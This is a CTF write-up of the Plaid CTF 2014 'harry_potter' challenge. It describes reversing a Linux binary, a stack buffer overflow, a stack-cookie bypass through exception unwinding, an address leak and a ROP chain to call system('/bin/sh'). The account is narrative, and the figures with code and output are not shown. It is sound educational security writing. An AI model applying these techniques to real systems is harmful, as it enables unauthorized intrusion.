Plaid CTF 2014 harry_potter Challenge
April 24, 2014
Accuvant sponsored the annual Plaid CTF event this year. It is one of our favorite events of the year for several reasons. First, we believe heavily in the lessons that these exercises teach. The time limits bring a motivating pressure; the result is often amazing feats of hacking that will be remembered for years to come. Solving challenges teaches you things and reinforces existing knowledge. We've been consistently impressed with the CTF events the PPP team has put on for the past several years. We were ecstatic to sponsor and participate. We also took on several of the challenges ourselves. What follows is a close look at the event's second highest value exploitation challenge.
PS. If you're interested in tackling challenges such as this on a regular basis, consider applying to join Accuvant's growing team of security researchers. We have open positions that cover a wide range of specialties and skill levels. We hope to hear from you soon!
Point Value: 300 (was doubled from 150 during the game)
If only we could get into this system, running at 184.108.40.206:666, we might get an idea of where The Plague as been keeping the Prime Factorizer.
The provided challenge program was listening on a TCP port on a remote machine. No other access was provided to said machine. However, the organizers graciously linked to a binary to examine.
Digging into the Binary
Opening the binary with IDA Pro showed it was an ELF64 binary for Linux. Unfortunately, we didn't have a decompiler handy. Our appetite for assembly was healthy anyway, so we pushed forward. Digging deeper, we quickly located the main function by inspecting the arguments to the call to__libc_start_main, shown in Figure 1. The argument was originally loc_400EE0, but we renamed it to main and navigated to it first thing.
Figure 1. _start with the typical call to __libc_start_main.
We followed the main cross-reference and converted the destination instructions to a procedure. Next we toggled graph mode and saw the first basic block, which appears in Figure 2.
Figure 2. The first basic block of main.
The main function starts by using the cerr iostream to display a message. Following that, it calls a function that we named authorize. We'll take a closer look at authorize in a moment, but first it's important to note three things about main.
- If authorize returns non-zero, the program will go off on a deep code path whose functionality is not immediately clear.
- If authorize returns zero, main informs the user that they entered the wrong password.
- The entire main function body appears to be wrapped in a try/catch block. This fact is evidenced by the floating, seemingly disconnected, basic blocks off to the side.
The string displayed both prior to calling authorize and when the return value is zero suggests the program expects a password. However, the password isn't checked in main so we proceeded to examine authorize. The first basic block is depicted in Figure 3.
Figure 3. The first basic block of authorize.
Looking at the function's local variables, we saw a couple of stack buffers. Reading on in the disassembly, we saw two calls to a function we named do_some_reading. That function takes three parameters: a file descriptor (zero in this case), a destination buffer, and a number of bytes to read. The astute reader might already see a problem, but we'll forego that for a moment to finish reversing the function.
After reading the length-prefixed string, we saw a call to a subroutine which we determined implements the memmem function (a GNU extension). The authorize function uses memmem to look for the string "PASSWORD" inside the input data. If the substring is not found, authorize prints an error message and returns zero. If "PASSWORD" is found, authorize creates a SHA512 hash of the string starting 9 bytes in and compares it to a digest at 0x404448 (in the binary's .rodata section). Googling for the hash revealed the plaintext value.
Supplying the correct string ("PASSWORD=wrong") caused authorize to return 1 to main. Upon returning, main displayed the excellent monkey-themed ASCII art shown in Figure 4.
Figure 4. Excellent ASCII art from the challenge creator.
If you didn't specify the correct password or you put your guess in the wrong format, authorize returned 0 to main and you were told about your failure. Regardless of password correctness, the program disconnected you. Being dissconnected was clearly at odds with our goal of obtaining a shell. This path was a red herring, but it was a fun, nevertheless. Thanks! Next, we turned our attention back at the two call to do_read_something.
About the Bug
Remember from Figure 3 that there are two calls to do_read_something. The first reads a 32-bit integer value into a local variable we named v_int. The second call reads v_int bytes into a stack buffer of 1024 bytes. The root cause issue is a lack of validation or sanitization done on v_int. Specifying more than 1024 bytes results in a stack buffer overflow. Ahh, the undefined behavior that we all know and love...
The trick in this challenge was not finding the bug, but rather figuring out how to exploit it. The authorize function contains stack cookies, which throws a wrench in our proverbial machine. So what could we do?
Next we tried sending various lengths of our favorite character (0x41). We started by overwriting just a small amount of data after the buffer. Figure 5 shows the output we saw when we overwrote only 32 bytes beyond the buffer.
Figure 5. Crash output on the __stack_chk_fail path.
We expected this output since we saw calls to __stack_chk_fail — indicating the stack was protected against buffer overflows. In addition, this output divulges information about the remote process's address space. We could clearly see that NX was enabled. Running the command a couple of times showed us that ASLR was disabled for the binary. We confirmed these findings by looking at the binary too, just to be safe:
Figure 6. Verifying exploit mitigations present.
The two commands in Figure 6 confirm that although the binary has a non-executable stack, it does *NOT* have PIE enabled. This means we can count on the addresses within the binary to remain constant. This is a key factor in successfully exploiting this process.
At this point we spun up an environment to be able to debug the provided binary. We hypothesized that it was running under some kind of inetd setup since it didn't implement any socket functionality. We turned to socat to mimic inetd. The two scripts in Figure 7 did the job.
Figure 7. Scripts to emulate inetd using socat.
With the ability to debug, we continued trying larger and larger overwrite lengths. Each time we saw a new crash we noted it and dug in to see what we could do with it.
Crash 1 - 1060 bytes
The nextcrash we saw occurred while unwinding the stack deep in the compiler runtime. It happens while generating the stack trace that is included in the output on the _stack_chk_fail path. An excerpt from the debugging session is presented in Figure 8.
Figure 8. Crash context with 36 bytes overwritten, in _Unwind_Backtrace.
Although the value of rcx was completely controlled, getting full code execution from this crash didn't look easy. We tried several different values for rcx, which corresponded to saved rip values from previous frames. As long as the value was readable, it led to that value being printed in the stack trace. The algorithm stops when it reaches a NULL rip. When properly terminated, the rest of the error output was printed and the program was aborted as was expected due to the corrupted cookie. Without success, we continued to try larger strings.
Crash 2 - 1316 bytes
The next interesting crash happened when we used a string of 1316 bytes. An excerpt from the debugging session follows in Figure 9.
Figure 9. Crash context with 292 bytes overwritten.
This crash was fairly interesting as it was trying to take the length of a string specified by a pointer under our control. It turns out that we corrupted the argv of the program. We tried pointing it to the Global Offset Table (GOT) entry for the read function from libc and witnessed the output from Figure 10.
Figure 10. The address of read in libc leaked.
As you can see from the output, we successfully leaked the value back to ourselves (in this case it was 0x7f74dba2dfd0). After printing this value out, the program crashed in the unwinding code again. We determined this context to be the same call stack as before, so we continued on.
Crash 3 - 1332 bytes
When passing only a few more bytes, we got a different crash. This time we crashed in the getenv function as seen in Figure 11.
Figure 11. Crash context with 308 bytes overwritten.
Like before, we crashed in code dealing with printing the stack corruption protection failure. This time we corrupted environ . Controlling this means that we could influence several environment related settings. However, we determined none of them would get us closer to a shell. To avoid crashing here, we simply set the pointer value to NULL. After doing so, the crash in the unwinding code reappeared again and we continued experimenting with longer lengths.
Crash 4 - >= 9224 bytes
After the crash inside getenv, we didn't get any more new crashes until we reached a rather large amount of data. Figure 12 shows the resulting debugger output.
Figure 12. Crash context inside getenv.
This crash occurred inside libc code while initializing the heap. Looking deeper, it turned out to be related to the environment variables being corrupted. We could control these pointers, but it wasn't immediately clear how setting various flags for the heap implementation would yield a better primitive. As before, we set the pointer to NULL and tried again. This time, the crash shown in Figure 13 appeared.
Figure 13. Crash context unwinding with _Unwind_RaiseException.
With this much input, we didn't crash while allocating an exception. Rather, we crashed again inside unwinding code. However, this time it was called from __cxa_throw instead of __stack_chk_fail. We also noticed that the program was no longer printing the "BAD FORMAT" error. Instead it printed "EXCEPTION: Error during read". To get a better understanding, we took a closer look at the do_read_something function in Figure 14.
Figure 14. Control flow graph of do_read_something.
This function loops trying to read data until one of two things happens: all of the expected data is successfully received or an error occurs. In the case the latter happens, do_read_something raises an exception using throw.
In normal circumstances, there are only two ways to get read to fail. The first is to disconnect from the remote host. This is less than desirable, since we wanted to get a shell. Further, we knew that ASLR was in effect and thus we would need to leak some memory address too. The other, and more useful, method is to cause read to try to write to an invalid memory address. This was exactly what was happening when we sent more than 9224 bytes.
At this point, we were crashing with rcx fully controlled but weren't sure exactly what to set it to. On a whim, we tried setting it to the original return address value (the one there before we smashed it, 0x400f00). Then we got the crash shown in Figure 15.
Figure 15. Crash context with the original return address restored.
This was MUCH better!! This is the type of crash one gets when the memory address about to be popped into rip by the retq instruction is not mapped. Setting it to a mapped value would redirect the flow of execution to the specified address. Thus, we had full control of rip. With such a primitive achieved, we started to see the light at the end of the tunnel. We moved towards building our payload that would give us a shell.
Getting a Shell
Despite having control of the program counter, we still needed to leak a memory address and use it in a subsequent request. The general strategy was simply to execute system("/bin/sh") and thus obtain the key for the challenge. The first step towards success was constructing a payload based on an address leaked from libc. We already experimented with leaking the address of the readfunction before, so this was a logical choice. But how could we keep the session open?
Looking again at main we saw an opportunity to re-use the code that printed the password prompt. We chose the location 0x400eee, which corresponds to the call to std::ostream::operator<< call in main. We quickly put together a small Return Oriented Programming (ROP) gadget sequence. We uded two gadget to set the rsi and rdi registers to the addresses of read in the GOT and std::cerr, respectively. Testing the memory disclosure exploit successfully gave us the address we desired. The only limitation to this technique was that output would terminate at the first NUL byte. This caused problems on occasion (when the leaked address contained a NUL) but nothing running the exploit again couldn't solve. :)
What's more though, is that this exploit also happened to re-enter the vulnerable code — allowing us to trigger the vulnerability again. This is exactly what we needed in order to utilize the information we just leaked. We refactored our exploit to send a secondary dynamic payload which we built based on the leaked address of read in libc. Unfortunately, it worked in our test environment but didn't work against the challenge server. Ugh.
Getting our exploit working reliably against the challenge server took extra effort. Tracing locally showed that the data received by the second trigger of the vulnerability was somewhat non-deterministic. After some thought, we decided this was likely due to a subtle interaction between the way stdin buffers input and random space added at the bottom of the stack when a process is created. We solved this by sending an initial payload with our ROP chain and then sending 8 bytes at a time until we received the "EXCEPTION" message. Then we could read the leaked data, craft our secondary exploit payload, and send it along reliably. After making these changes, we ran the exploit against the challenge server and obtained a shell.
This challenge was very interesting and required exploring new exploitation mitigation bypass techniques. It is likely that very few people know about the technique showcased. Although this technique only applies in specific circumstances, it none-the-less advances the state of the art in exploitation. Those well versed in Windows exploitation will be quick to see similarities between this technique and the venerable SEH bypass technique. Mix in a few subtle complications stemming from non-determinism and buffering and it's clear to see why the point value for this challenge was increased during the game. A+++ will hack again!